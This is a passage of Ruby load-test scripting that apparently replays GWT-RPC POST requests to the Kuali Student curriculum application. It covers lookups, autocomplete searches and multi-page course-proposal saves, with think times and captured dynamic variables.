{\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponentType.credit.degree.fixed|kuali.resultComponentType.credit.degree.range|kuali.resultComponentType.credit.degree.multiple|lrc.search.resultComponentType|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|1|7|8|6|3|9|10|9|11|9|12|0|13|14|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponentType.credit.degree.fixed|kuali.resultComponentType.credit.degree.range|kuali.resultComponentType.credit.degree.multiple|lrc.search.resultComponentType|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|1|7|8|6|3|9|10|9|11|9|12|0|13|14|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponentType.credit.degree.fixed|kuali.resultComponentType.credit.degree.range|kuali.resultComponentType.credit.degree.multiple|lrc.search.resultComponentType|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|1|7|8|6|3|9|10|9|11|9|12|0|13|14|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|atp.advancedAtpSearchParam.atpType|java.lang.String/2004016611|kuali.atp.type.Spring|kuali.atp.type.Summer|kuali.atp.type.Fall|kuali.atp.type.Session1|kuali.atp.type.Session2|kuali.atp.type.Mini-mester1A|kuali.atp.type.Mini-mester1B|atp.search.advancedAtpSearch|atp.resultColumn.atpStartDate|1|2|3|4|1|5|5|0|0|6|1|7|8|6|7|9|10|9|11|9|12|9|13|9|14|9|15|9|16|0|17|18|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|atp.resultColumn.atpSeasonTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|atp.resultColumn.atpSeasonTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.passFail|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.completedNotation|kuali.resultComponent.grade.percentage|lrc.search.resultComponent|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|5|11|12|11|13|11|14|11|15|11|16|0|17|18|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.passFail|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.completedNotation|kuali.resultComponent.grade.percentage|lrc.search.resultComponent|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|5|11|12|11|13|11|14|11|15|11|16|0|17|18|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CommentRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|58FCBA6F511FF769D9DF8CAE72C3C369|org.kuali.student.core.comments.ui.client.service.CommentRpcService|getUserRealName|java.lang.String/2004016611|#{opts[:propose_person]}|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|subjectCode.queryParam.code||subjectCode.search.orgsForSubjectCode|subjectCode.resultColumn.orgLongName|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|19|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|atp.advancedAtpSearchParam.atpType|java.lang.String/2004016611|kuali.atp.type.Spring|kuali.atp.type.Summer|kuali.atp.type.Fall|kuali.atp.type.Session1|kuali.atp.type.Session2|kuali.atp.type.Mini-mester1A|kuali.atp.type.Mini-mester1B|atp.advancedAtpSearchParam.atpStartDateAtpConstraintId|atp.search.advancedAtpSearch|atp.resultColumn.atpStartDate|1|2|3|4|1|5|5|0|0|6|2|7|8|6|7|9|10|9|11|9|12|9|13|9|14|9|15|9|16|0|7|17|0|0|18|19|0|0|\"\n }\n )\n \n \n #\n # Pg1 - Course Information\n #\n\n @request.add_thinktime(5)\n\n # Course Subject Area\n # AJAX popup while typing in subject area\n for i in 1..opts[:subject_area].length\n itr = i-1\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|12|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|subjectCode.queryParam.code|#{opts[:subject_area][0..itr]}|subjectCode.search.subjectCodeGeneric|subjectCode.resultColumn.code|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|12|0|0|\"\n } \n ) \n end\n\n @request.add_thinktime(3)\n\n # Instructor\n for i in 1..opts[:instructor].length\n itr = i-1\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|12|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|person.queryParam.personGivenName|#{opts[:instructor][0..itr]}|person.search.personQuickViewByGivenName|person.resultColumn.DisplayName|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|12|0|0|\"\n } \n ) \n end\n\n\n @request.add_thinktime(22)\n\n # Save & Continue\n contents1 = \"5|0|41|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|proposal|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|type|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|kuali.proposal.type.course.create|workflowNode|PreRoute|name|#{opts[:course_title]}|_runtimeData|dirty|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|rationale|#{opts[:course_rationale]}|courseTitle|#{opts[:course_rationale]}|transcriptTitle|subjectArea|courseNumberSuffix|instructors|#{opts[:course_short_title]}|#{opts[:subject_area]}|#{opts[:course_suffix]}|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|personId|#{opts[:instructor]}|id-translation|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|descr|plain|#{opts[:course_description]}\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|8|8|9|10|5|6|7|0|5|8|11|12|13|8|14|12|15|8|16|12|17|8|18|10|5|6|7|0|1|8|19|10|5|6|7|0|2|-11|20|21|1|8|22|20|-22|-15|-17|-5|-13|-23|12|23|-1|-3|8|24|12|25|-13|10|5|6|7|0|1|-17|10|5|6|7|0|5|-26|20|-22|8|26|20|-22|8|27|20|-22|8|28|20|-22|8|29|20|-22|-29|-17|-1|-13|-35|12|30|-37|12|31|-39|12|32|-41|10|5|6|7|0|1|33|34|0|10|5|6|7|0|2|8|35|12|36|8|18|10|5|6|7|0|1|8|35|10|5|6|7|0|1|8|37|12|38|-58|-60|-52|-56|-47|-49|-1|8|29|8|39|10|5|6|7|0|2|8|40|12|41|-13|10|5|6|7|0|1|-17|10|5|6|7|0|1|-71|20|-22|-74|-17|-69|-13|-1|-67|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:proposal_dyn_var_name], \"regexp\" => opts[:proposal_dyn_var_regexp]},\n {\"name\" => opts[:clu_ref_dyn_var_name], \"regexp\" => opts[:clu_ref_dyn_var_regexp]},\n {\"name\" => opts[:proposal_doc_id_var_name], \"regexp\" => opts[:proposal_doc_id_var_regexp]},\n {\"name\" => opts[:version_ind_id_name], \"regexp\" => opts[:version_ind_id_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/proposal_dyn_var_name/%%_#{opts[:proposal_dyn_var_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/clu_ref_dyn_var_name/%%_#{opts[:clu_ref_dyn_var_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/proposal_doc_id_var_name/%%_#{opts[:proposal_doc_id_var_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/version_ind_id_name/%%_#{opts[:version_ind_id_name]}%%\", {}, {'subst' => 'true'})\n \n \n \n #\n # Pg 2 - Governance\n # Campus Locations: All\n #\n\n @request.add_thinktime(5)\n\n # COC Org\n # Biology Dept\n\n @request.add_thinktime(3)\n\n # Admin Org\n # Botany\n for i in 1..admin_org.length\n if(i == admin_org.length)\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:admin_dep_var_name], \"regexp\" => opts[:admin_dep_var_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/admin_dep_var_name/%%_#{opts[:admin_dep_var_name]}%%\", {}, {'subst' => 'true'})\n else\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n } \n )\n end \n end\n\n @request.add_thinktime(15)\n\n # Save & Continue\n contents1 = \"5|0|101|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|AL|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|courseTitle|#{opts[:course_title]}|creditOptions|crossListings|descr|plain|#{opts[:course_description]}|expenditure|affiliatedOrgs|fees|formats|gradingOptions|id|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|_runtimeData|id-translation|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|metaInfo|createId|#{opts[:propose_person]}|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.util.Date/1659716317|updateId|updateTime|versionInd|#{version_indicator+=1}|pilotCourse|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|revenues|specialTopicsCourse|state|draft|subjectArea|#{opts[:subject_area]}|termsOffered|transcriptTitle|#{opts[:course_short_title]}|type|kuali.lu.type.CreditCourse|unitsContentOwner|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|dirty|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|2|name|#{opts[:course_title]}|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|32|8|9|10|5|6|7|0|1|11|12|0|13|14|-1|8|9|8|15|13|16|8|17|13|18|8|19|10|5|6|7|0|0|-1|-15|8|20|13|21|8|22|10|5|6|7|0|0|-1|-21|8|23|10|5|6|7|0|0|-1|-25|8|24|10|5|6|7|0|1|8|25|13|26|-1|-29|8|27|10|5|6|7|0|1|8|28|10|5|6|7|0|0|-37|-39|-1|-35|8|29|10|5|6|7|0|0|-1|-43|8|30|10|5|6|7|0|0|-1|-47|8|31|10|5|6|7|0|0|-1|-51|8|32|13|33|8|34|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|35|13|36|8|37|10|5|6|7|0|1|8|35|10|5|6|7|0|1|8|38|13|39|-69|-71|-63|-67|-59|-61|-1|-57|8|40|10|5|6|7|0|0|-1|-77|8|41|13|42|8|43|10|5|6|7|0|5|8|44|13|45|8|46|47|48|3467218721|1309965025280|8|49|13|45|8|50|47|48|3467218721|1309965025280|8|51|13|52|-1|-83|8|53|54|55|0|8|56|10|5|6|7|0|0|-1|-102|8|57|54|-101|8|58|13|59|8|60|13|61|8|62|10|5|6|7|0|0|-1|-112|8|63|13|64|8|65|13|66|8|67|10|5|6|7|0|2|11|-8|13|68|8|37|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|38|13|69|-128|-130|-122|-126|-1|8|67|8|70|10|5|6|7|0|2|11|-8|13|71|8|37|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|38|13|72|-145|-147|-139|-143|-1|8|70|8|73|10|5|6|7|0|0|-1|-154|8|74|10|5|6|7|0|3|8|75|47|48|3467218721|1309965025280|8|76|77|78|1|0|8|79|13|80|-1|-158|8|37|10|5|6|7|0|2|8|60|10|5|6|7|0|1|8|38|13|61|-172|-174|8|81|10|5|6|7|0|3|8|9|54|55|1|8|67|54|-186|8|70|54|-186|-172|-180|-1|-170|8|82|10|5|6|7|0|12|8|83|13|84|8|32|13|85|8|43|10|5|6|7|0|5|8|44|13|45|8|46|47|48|3467218994|1309965025280|8|49|13|45|8|50|47|48|3467219879|1309965025280|8|51|13|86|-193|-199|8|87|13|88|8|89|10|5|6|7|0|1|11|-8|13|33|-193|-217|8|90|13|91|8|92|10|5|6|7|0|0|-193|-225|8|93|10|5|6|7|0|0|-193|-229|8|94|13|95|8|58|13|96|8|65|13|97|8|98|13|99|-1|-191|8|100|10|5|6|7|0|1|8|101|10|5|6|7|0|0|-243|-245|-1|-241|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lu.queryParam.luOptionalLuTypeStartsWith|kuali.lu.type.activity.|lu.search.all.lu.Types|lu.resultColumn.luTypeName|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.atptype.duration|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n \n \n #\n # Course Logistics \n # Term: Any\n # Duration Type: Semester\n # Duration Count: 2\n # Assessment Scale: Letter\n # Standard Final Exam\n # Outcome: 10 credits\n # Course Format\n # => Activity Type: Lab, Contact Hours: 5, Frequency: weekly\n # => Duration Type: Weekly\n # => Duration: 13\n # => Anticipated class size: 100\n\n @request.add_thinktime(30)\n\n # Save & Continue\n contents1 = \"5|0|126|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|courseTitle|#{opts[:course_title]}|creditOptions|dirty|type|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|fixedCreditValue|created|kuali.resultComponentType.c